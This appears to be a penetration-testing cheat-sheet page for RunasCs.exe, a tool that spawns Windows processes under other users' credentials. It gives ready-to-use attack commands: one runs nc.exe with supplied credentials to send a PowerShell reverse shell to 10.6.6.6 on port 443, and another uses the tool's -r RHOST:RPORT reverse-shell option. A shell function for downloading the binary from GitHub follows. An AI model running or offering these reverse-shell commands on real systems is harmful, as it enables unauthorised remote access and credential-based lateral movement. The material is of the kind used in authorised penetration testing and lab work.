Spawn Processes as Other Users
RunasCs.exe
Project GitHub
https://github.com/antonioCoco/RunasCs/releases
Example Usage
Spawn Process with Network Credentials
# -l 8 : logontype 8 (NetworkCleartext)
# Launch reverse PowerShell session over Netcat socket
.\RunasCs.exe -d domain.tld -l 8 'username' 'password' 'C:\Windows\Temp\nc.exe 10.6.6.6 443 -e powershell.exe'
Spawn Process with Logon
.\RunasCs.exe username_here password_here powershell.exe -r RHOST:RPORT
Easy Download
I put a function in my .zshrc
file and run download_runascs
to easily grab the latest version of the binary from GitHub releases.
# Download latest version of RunasCs from GitHub
function download_runascs() {
# Variables
download_base_url='https://github.com/antonioCoco/RunasCs/releases/download/'
tags_base_url='https://github.com/antonioCoco/RunasCs/tags'
output_name='RunasCs.zip'
url_version=$(
curl -s $tags_base_url |
grep 'releases/tag/v' |
head -n 1 |
cut -d '>' -f 3 |
cut -d '<' -f 1
)
binary_version=$(echo $url_version | tr -d 'v')
download_url="${download_base_url}/${url_version}/${output_name}"
# Download, extract, set mode
curl -sL $download_url -o "$PWD/${output_name}"
unzip -qq "${output_name}"
echo "RunasCs binaries downloaded and unarchived in $PWD"
}